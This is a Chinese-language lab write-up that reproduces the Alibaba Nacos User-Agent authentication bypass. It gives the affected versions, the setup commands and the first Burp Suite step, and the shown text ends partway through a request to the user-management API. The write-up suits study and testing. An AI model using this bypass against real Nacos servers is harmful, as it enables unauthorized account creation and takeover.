Alibaba Nacos未授权访问漏洞复现
漏洞概述
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。 通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
影响版本
Nacos <= 2.0.0-ALPHA.1
环境搭建
下载地址
https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz
安装步骤:
解压:tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
进入nacos的bin目录:cd nacos/bin
清除windows启动脚本:rm -rf *.cmd
启动单节点模式:./startup.sh -m standalone
访问http://ip/nacos即可看到页面
复现过程
第一步:用burpsuite抓个首页的包或随便其他页面的包,发送至Repeater模块,先修改包试一下能不能成功,修改成如下内容:
GET /nacos/v1/auth/users?pageNo